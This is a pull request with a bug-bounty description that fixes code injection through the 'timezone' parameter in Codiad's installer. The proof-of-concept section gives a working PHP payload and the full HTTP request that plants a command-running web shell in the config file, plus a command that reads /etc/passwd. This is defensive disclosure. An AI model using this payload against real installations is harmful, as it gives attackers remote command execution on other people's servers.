### PR TITLE
Fixed Arbitrary Code Execution

### DIFF
--- a/components/install/process.php
+++ b/components/install/process.php
@@ -83,7 +83,7 @@ if (!file_exists($users) && !file_exists($projects) && !file_exists($active)) {
     } else {
         $project_path = $project_name;
     }
-    $timezone = $_POST['timezone'];
+    $timezone = preg_replace('/[^a-zA-Z\/]/', '', $_POST['timezone']);
 
     //////////////////////////////////////////////////////////////////
     // Create Projects files
@@ -160,7 +160,7 @@ define("WHITEPATHS", BASE_PATH . ",/home");
 $cookie_lifetime = "0";
 
 // TIMEZONE
-date_default_timezone_set("' . $_POST['timezone'] . '");
+date_default_timezone_set("' . $timezone . '");
 
 // External Authentification
 //define("AUTH_PATH", "/path/to/customauth.php");

--- a/components/install/process.php
+++ b/components/install/process.php
@@ -160,7 +160,11 @@ define("WHITEPATHS", BASE_PATH . ",/home");
 $cookie_lifetime = "0";
 
 // TIMEZONE
-date_default_timezone_set("' . $timezone . '");
+try {
+    date_default_timezone_set("' . $timezone . '");
+} catch (Exception $e) {
+    date_default_timezone_set("UTC");
+}
 
 // External Authentification
 //define("AUTH_PATH", "/path/to/customauth.php");


### PR DESCRIPTION
### 📊 Metadata *

#### Bounty URL: https://www.huntr.dev/bounties/1-packagist-codiad

### ⚙️ Description *

The project `Codiad` accepted a `POST` request to the file/path `/components/install/process.php` where the parameter `timezone` when given a PHP payload (`eval()`), it will get executed after saving the config file (`saveFile()`).

### 💻 Technical Description *

The lack of validation of user input leads to **Arbitrary Code Execution**. The `POST` request parameter `timezone` accepted on `/components/install/process.php` wasn't sanitized/escaped to be passed into a PHP code execution function which when given a payload like:

```
'")%3b+system($_GET["cmd"])%3b+print("'
```

will give you a reverse shell on `/data/config.php?cmd=` **=>** `https://example.com/data/config.php?cmd=cat /etc/passwd`.

### 🐛 Proof of Concept (PoC) *

**POST Request to `/components/install/process.php`:**

```
POST /components/install/process.php HTTP/1.1
Host: codiad.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 170

path=/var/www/html/data&amp;username=/tmp/dada&amp;password=/tmp/dada&amp;project_name=/tmp/dada&amp;project_path=/var/www/html/data/data&amp;timezone='")%3b+system($_GET["cmd"])%3b+print("'
```

### 🔥 Proof of Fix (PoF) *

Escaped the input value with `preg_replace()` where it doesn't allow any PHP function/code to be executed. As it's a **`timezone`** value, it will only accepts values like / make the value like:

- Asia/Kolkata
- America/Chicago
- America/Managua

because it's passed to `date_default_timezone_set()` on line `163` so it should accept values like the examples above.

### 👍 User Acceptance Testing (UAT)

_Escapes a user input with Regex to only accept timezone values, no other breaking changes are introduced._
